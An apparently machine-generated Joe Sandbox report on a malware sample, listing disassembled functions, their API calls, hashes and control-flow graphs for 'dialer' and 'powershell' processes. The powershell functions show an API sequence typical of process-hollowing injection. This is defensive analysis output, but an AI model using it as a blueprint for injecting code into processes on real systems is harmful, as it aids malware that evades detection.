                                                                  control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 509 140001cf4-140001cfe call 140001d40 503->509 510 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->510 504->505 507 140001c04 504->507 505->502 505->503 511 140001cd7-140001cf3 memcpy 507->511 514 140001d03-140001d1e call 140001d40 509->514 510->514 517 140001c72-140001c79 510->517 518 140001d23-140001d38 GetLastError call 140001d40 514->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->511 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DF8,0000000140007DF8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DF8,0000000140007DF8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                  • memcpy.MSVCRT ref: 0000000140001CE0
                                                                  • GetLastError.KERNEL32(?,?,?,?,0000000140007DF8,0000000140007DF8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 2595394609-2123141913
                                                                  • Opcode ID: b6585465a2f05c01175db11acf9f7dc49478311fb90e361966a65ca9776a65ce
                                                                  • Instruction ID: cdb230e1ef6f7a2394f5e18ac8b6d032a855755febd0cb1b64a996fcc1728738
                                                                  • Opcode Fuzzy Hash: b6585465a2f05c01175db11acf9f7dc49478311fb90e361966a65ca9776a65ce
                                                                  • Instruction Fuzzy Hash: 494132B1201A4486FA66DF97F884BE927A0F78DBC4F554526EF0E877B1DA38C586C700
                                                                  Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 535 14000220b-140002212 LeaveCriticalSection 531->535 536 14000212e-14000213c 531->536 533 140002272-140002280 532->533 534 140002223-14000222d 532->534 537 140002241-140002263 DeleteCriticalSection 534->537 538 14000222f 534->538 535->532 539 14000214d-140002159 TlsGetValue GetLastError 536->539 537->533 540 140002230-14000223f free 538->540 541 14000215b-14000215e 539->541 542 140002140-140002147 539->542 540->537 540->540 541->542 543 140002160-14000216d 541->543 542->535 542->539 543->542
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                  • String ID:
                                                                  • API String ID: 3326252324-0
                                                                  • Opcode ID: af4863ad55e9be3948dd3f8b92581dcfb2da1e9ba0e5ff862a0098994ca326ab
                                                                  • Instruction ID: fe4873fd32a2debdddda51fa9ba6133c569768c8fc11484b8c125a382026d3df
                                                                  • Opcode Fuzzy Hash: af4863ad55e9be3948dd3f8b92581dcfb2da1e9ba0e5ff862a0098994ca326ab
                                                                  • Instruction Fuzzy Hash: B321E3B0705A0192FA6BDB53F9483E823A4BB6CBD0F444121FF5A576B4DB798986C300
                                                                  Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 554 140001f23-140001f2d 552->554 555 140001ed3-140001ee2 signal 552->555 556 140001eb5-140001eba 553->556 557 140001efb-140001f0a call 140006bd0 553->557 561 140001f43-140001f45 554->561 562 140001f2f-140001f3f 554->562 555->554 559 140001ee4-140001ee8 555->559 556->548 558 140001ec0 556->558 557->554 566 140001f0c-140001f10 557->566 558->554 563 140001eea-140001ef9 signal 559->563 564 140001f4e-140001f53 559->564 561->548 562->561 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CCG
                                                                  • API String ID: 0-1584390748
                                                                  • Opcode ID: 5ae0183bb3e8df43bf7b800ab47aff4b5323fb398a3dc02e0685aa06d0cc4238
                                                                  • Instruction ID: 32d80918a5fc0d3f209f19ed34055b18f0ef7c89e2b1fcaed64eceb18b648f5f
                                                                  • Opcode Fuzzy Hash: 5ae0183bb3e8df43bf7b800ab47aff4b5323fb398a3dc02e0685aa06d0cc4238
                                                                  • Instruction Fuzzy Hash: D22139B1A0161542FA77DA2BB5903FA2192ABCC7E4F258535BF19873F5DF3888C28241
                                                                  Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 581 14000194d-140001954 578->581 582 14000191e-140001929 578->582 580 140001943-140001947 579->580 579->581 580->581 584 140001a20-140001a26 580->584 585 140001956-140001961 581->585 586 14000199e-1400019a6 581->586 582->581 583 14000192b-14000193a 582->583 583->579 589 140001b87-140001b98 call 140001d40 584->589 590 140001a2c-140001a37 584->590 587 140001970-14000199c call 140001ba0 585->587 586->572 588 1400019a8-1400019c1 586->588 587->586 594 1400019df-1400019e7 588->594 590->586 591 140001a3d-140001a5f 590->591 597 140001a7d-140001a97 591->597 595 1400019e9-140001a0d VirtualProtect 594->595 596 1400019d0-1400019dd 594->596 595->596 596->572 596->594 600 140001b74-140001b82 call 140001d40 597->600 601 140001a9d-140001afa 597->601 600->589 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->586 612->597 613->609 614->600
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 544645111-395989641
                                                                  • Opcode ID: 33ff9c26ba1a50189676bcdea232609c43de2a965b763305e03269797e3983e4
                                                                  • Instruction ID: d95b69f808bbd9c9542974b089c040f35f1bf1f56e437b3fcff01fca96367475
                                                                  • Opcode Fuzzy Hash: 33ff9c26ba1a50189676bcdea232609c43de2a965b763305e03269797e3983e4
                                                                  • Instruction Fuzzy Hash: BB5105B6B11544DAEB12CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700
                                                                  Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-3474627141
                                                                  • Opcode ID: 7ca9402c377c7502ec41e05436912aeebb55393020027df2fd4a95d8ace9b475
                                                                  • Instruction ID: c63db515c4fb09d3b511a87353661d5ddb22af0fe9f44d3f7c4a04084b72718c
                                                                  • Opcode Fuzzy Hash: 7ca9402c377c7502ec41e05436912aeebb55393020027df2fd4a95d8ace9b475
                                                                  • Instruction Fuzzy Hash: 40F0F671A04A4482E212EF2AB9413ED6360E74D3C0F40D211FF4DA32A1DF3CD182C300
                                                                  Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                  • String ID:
                                                                  • API String ID: 682475483-0
                                                                  • Opcode ID: 359475ec8b7528c77e115259b106b0472551a1d365d7dff617278925673e248b
                                                                  • Instruction ID: e122d931978df067e2f6f523752654566603ac09ede92c32e374204b0c7f82cb
                                                                  • Opcode Fuzzy Hash: 359475ec8b7528c77e115259b106b0472551a1d365d7dff617278925673e248b
                                                                  • Instruction Fuzzy Hash: 3F01B2B5705A0192FA6BDB53FE083D86364BB6CBD1F454021EF0953AB4DB79C996C300

                                                                  Execution Graph

                                                                  Execution Coverage:56.2%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:87.5%
                                                                  Total number of Nodes:8
                                                                  Total number of Limit Nodes:1

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_0000000140832CF2 1 Function_0000000140832F61 2 Function_0000000140832D30 2->0 2->1 3 Function_0000000140832CB0 3->2

                                                                  Executed Functions

                                                                  Function 0000000140832D30 Relevance: 6.2, APIs: 4, Instructions: 209memorylibraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 140832d30-140832d33 1 140832d3d-140832d41 0->1 2 140832d43-140832d4b 1->2 3 140832d4d 1->3 2->3 4 140832d35-140832d3a 3->4 5 140832d4f-140832d52 3->5 4->1 6 140832d5b-140832d62 5->6 8 140832d64-140832d6c 6->8 9 140832d6e 6->9 8->9 10 140832d54-140832d59 9->10 11 140832d70-140832d73 9->11 10->6 12 140832d75-140832d83 11->12 13 140832d8e-140832d90 11->13 15 140832d85-140832d8a 12->15 16 140832ddd-140832dfc 12->16 17 140832d92-140832d98 13->17 18 140832d9a 13->18 20 140832dc4-140832dc7 15->20 22 140832d8c 15->22 19 140832e2d-140832e30 16->19 17->18 18->20 21 140832d9c-140832da0 18->21 25 140832e32-140832e33 19->25 26 140832e35-140832e3b 19->26 33 140832dc9-140832dd8 call 140832cf2 20->33 23 140832da2-140832da8 21->23 24 140832daa 21->24 22->21 23->24 24->20 27 140832dac-140832db3 24->27 28 140832e14-140832e18 25->28 30 140832e42-140832e46 26->30 44 140832db5-140832dbb 27->44 45 140832dbd 27->45 31 140832e1a-140832e1d 28->31 32 140832dfe-140832e01 28->32 34 140832e48-140832e60 LoadLibraryA 30->34 35 140832e9e-140832ea6 30->35 31->26 39 140832e1f-140832e23 31->39 32->26 36 140832e03 32->36 33->1 41 140832e62-140832e69 34->41 38 140832eaa-140832eb3 35->38 43 140832e04-140832e08 36->43 46 140832ee2-140832f42 VirtualProtect * 2 call 140832f61 38->46 47 140832eb5-140832eb7 38->47 39->43 48 140832e25-140832e2c 39->48 41->30 42 140832e6b 41->42 50 140832e77-140832e7f 42->50 51 140832e6d-140832e75 42->51 43->28 52 140832e0a-140832e0c 43->52 44->45 45->27 53 140832dbf-140832dc2 45->53 60 140832f47-140832f4c 46->60 54 140832eca-140832ed8 47->54 55 140832eb9-140832ec8 47->55 48->19 57 140832e81-140832e8d GetProcAddressForCaller 50->57 51->57 52->28 58 140832e0e-140832e12 52->58 53->33 54->55 59 140832eda-140832ee0 54->59 55->38 61 140832e98 ExitProcess 57->61 62 140832e8f-140832e96 57->62 58->28 58->31 59->55 63 140832f51-140832f56 60->63 62->41 63->63 64 140832f58 63->64
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000041.00000002.2936453016.000000014082C000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000041.00000002.2936323754.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000041.00000002.2936453016.00000001404C8000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000041.00000002.2936453016.00000001404EC000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000041.00000002.2936453016.00000001404EF000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000041.00000002.2936453016.0000000140777000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000041.00000002.2936453016.00000001407F8000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000041.00000002.2938364013.0000000140834000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                  • String ID:
                                                                  • API String ID: 1941872368-0
                                                                  • Opcode ID: fc7b6a3bd621f7d17f98b0102345922539b498eb494b6f3c4a19026b9e8f6b5c
                                                                  • Instruction ID: 490267afce550785c801030b00c3b8e77ffef9829ef37814adfd0db67bac2f23
                                                                  • Opcode Fuzzy Hash: fc7b6a3bd621f7d17f98b0102345922539b498eb494b6f3c4a19026b9e8f6b5c
                                                                  • Instruction Fuzzy Hash: 97614832F4025745FB275BAAEB853E86350A39D7B4F084721CBB9433F6E67A88568310

                                                                  Execution Graph

                                                                  Execution Coverage:6.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:27
                                                                  Total number of Limit Nodes:0

                                                                  Executed Functions

                                                                  Function 00007FFD9B8B0C7D Relevance: 1.6, APIs: 1, Instructions: 127nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 207 7ffd9b8b0c7d-7ffd9b8b0c89 208 7ffd9b8b0c8b-7ffd9b8b0c93 207->208 209 7ffd9b8b0c94-7ffd9b8b0d08 207->209 208->209 213 7ffd9b8b0d0a-7ffd9b8b0d0f 209->213 214 7ffd9b8b0d12-7ffd9b8b0d55 NtWriteVirtualMemory 209->214 213->214 215 7ffd9b8b0d57 214->215 216 7ffd9b8b0d5d-7ffd9b8b0d7a 214->216 215->216
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryVirtualWrite
                                                                  • String ID:
                                                                  • API String ID: 3527976591-0
                                                                  • Opcode ID: 8b1d4cd132bfab91e3304f29c26c0e6f8698456c99936a92ff416518208980c2
                                                                  • Instruction ID: 06daf592628fb52f233194c6aab0843917f6ff36c19045b1b26107f7064275bc
                                                                  • Opcode Fuzzy Hash: 8b1d4cd132bfab91e3304f29c26c0e6f8698456c99936a92ff416518208980c2
                                                                  • Instruction Fuzzy Hash: E831163190CB4D9FDB299B68D845BE9BBE4FF16320F04026EE059D3692CB21B402CB85
                                                                  Function 00007FFD9B8AE098 Relevance: 1.6, APIs: 1, Instructions: 122nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 217 7ffd9b8ae098-7ffd9b8ae0b6
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: SectionUnmapView
                                                                  • String ID:
                                                                  • API String ID: 498011366-0
                                                                  • Opcode ID: 3892b5094106809d4cc517fcb36c73ef8c5072e0c02c249050b38b247b9e1a3a
                                                                  • Instruction ID: 3842eadfcd6e816a8351322554f89b182702ad51d2a98788cc714c4f3c102dda
                                                                  • Opcode Fuzzy Hash: 3892b5094106809d4cc517fcb36c73ef8c5072e0c02c249050b38b247b9e1a3a
                                                                  • Instruction Fuzzy Hash: 3B315772A0D74C8FEB58CB98D8497B97BF0FBA9320F04416FD049C31A6E620A945C751
                                                                  Function 00007FFD9B8B0A5E Relevance: 1.6, APIs: 1, Instructions: 117nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 224 7ffd9b8b0a5e-7ffd9b8b0a6b 225 7ffd9b8b0a76-7ffd9b8b0b28 NtUnmapViewOfSection 224->225 226 7ffd9b8b0a6d-7ffd9b8b0a75 224->226 230 7ffd9b8b0b2a 225->230 231 7ffd9b8b0b30-7ffd9b8b0b4c 225->231 226->225 230->231
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: SectionUnmapView
                                                                  • String ID:
                                                                  • API String ID: 498011366-0
                                                                  • Opcode ID: f675c630cf44929827dc4571c4b6e4967506c4416dbab6f3466c829ef9b0b82d
                                                                  • Instruction ID: 452f9bcbdaf237e0e0daee35a0d3ee2c18a10fdc961735eb5498c6923e8bfddd
                                                                  • Opcode Fuzzy Hash: f675c630cf44929827dc4571c4b6e4967506c4416dbab6f3466c829ef9b0b82d
                                                                  • Instruction Fuzzy Hash: F531F83060D7888FDB5ADFA8CC557A97FE0EF56320F04429BD049C71A7D674A446CB92
                                                                  Function 00007FFD9B8AE0A8 Relevance: 1.6, APIs: 1, Instructions: 117nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 221 7ffd9b8ae0a8-7ffd9b8ae0b6
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: SectionUnmapView
                                                                  • String ID:
                                                                  • API String ID: 498011366-0
                                                                  • Opcode ID: f3b05bb11942f3b5acee0f6915ef40ce21c2cc27fdfcc779756f54546e194a69
                                                                  • Instruction ID: 7ce90efc9bce5a2681412da3e139f7f8569e1a36246167d5059fe03d4559226b
                                                                  • Opcode Fuzzy Hash: f3b05bb11942f3b5acee0f6915ef40ce21c2cc27fdfcc779756f54546e194a69
                                                                  • Instruction Fuzzy Hash: D1313871A0D74C8FDB58DF98D8497A97BF0FBA9320F04416FD049D31A2D634A945CB51
                                                                  Function 00007FFD9B8B1004 Relevance: 1.6, APIs: 1, Instructions: 115nativethreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 232 7ffd9b8b1004-7ffd9b8b100b 233 7ffd9b8b1016-7ffd9b8b10c2 NtResumeThread 232->233 234 7ffd9b8b100d-7ffd9b8b1015 232->234 238 7ffd9b8b10ca-7ffd9b8b10e6 233->238 239 7ffd9b8b10c4 233->239 234->233 239->238
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: ce6f9c67a4d404685f9321bb1da1e563d1670c4ded540d4f20cd3becc498b8f9
                                                                  • Instruction ID: dca8d5c2580dd70a002f431a9d43f0c3ea14e6bfbe324a8100bc1e2aff581981
                                                                  • Opcode Fuzzy Hash: ce6f9c67a4d404685f9321bb1da1e563d1670c4ded540d4f20cd3becc498b8f9
                                                                  • Instruction Fuzzy Hash: B931E731A0C65C8FDB58DF98D8467E9BBE1EF5A320F04416BD049C7292DB70A846CB91
                                                                  Function 00007FFD9B8AE0C8 Relevance: 1.6, APIs: 1, Instructions: 102nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 240 7ffd9b8ae0c8-7ffd9b8b0b28 NtUnmapViewOfSection 245 7ffd9b8b0b2a 240->245 246 7ffd9b8b0b30-7ffd9b8b0b4c 240->246 245->246
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: SectionUnmapView
                                                                  • String ID:
                                                                  • API String ID: 498011366-0
                                                                  • Opcode ID: 5e95f1355e6d9dca12695d2e14ec465dec5899cecda8db38e6dc0b07a20cb820
                                                                  • Instruction ID: e0bd2db66b9c037160e0603eaff8bbc0f325618e121e875435eaa1f4fd2a287c
                                                                  • Opcode Fuzzy Hash: 5e95f1355e6d9dca12695d2e14ec465dec5899cecda8db38e6dc0b07a20cb820
                                                                  • Instruction Fuzzy Hash: A721E671A0CA0C8FDB58DF98D8457B97BE0EB99320F04416FD04AD3262DA74A846CB91
                                                                  Function 00007FFD9B8B0F40 Relevance: 1.6, APIs: 1, Instructions: 98nativethreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 247 7ffd9b8b0f40-7ffd9b8b0fd8 NtSetContextThread 251 7ffd9b8b0fda 247->251 252 7ffd9b8b0fe0-7ffd9b8b0ffc 247->252 251->252
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThread
                                                                  • String ID:
                                                                  • API String ID: 1591575202-0
                                                                  • Opcode ID: 5bf9d526aa81f55d31949fa4c7c0a1e1ff38195a4c6b4b8278dabb8b5e79bb04
                                                                  • Instruction ID: 6caafceb4c4548b02754b2575d9654a3eab0004896b359ee0637a71ec644471b
                                                                  • Opcode Fuzzy Hash: 5bf9d526aa81f55d31949fa4c7c0a1e1ff38195a4c6b4b8278dabb8b5e79bb04
                                                                  • Instruction Fuzzy Hash: C121F93060C74C4FDB68DF68D846AEA7BE1EB56320F00425ED059C7192CA219457CB51
                                                                  Function 00007FFD9B8B0241 Relevance: 2.4, APIs: 1, Instructions: 899processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
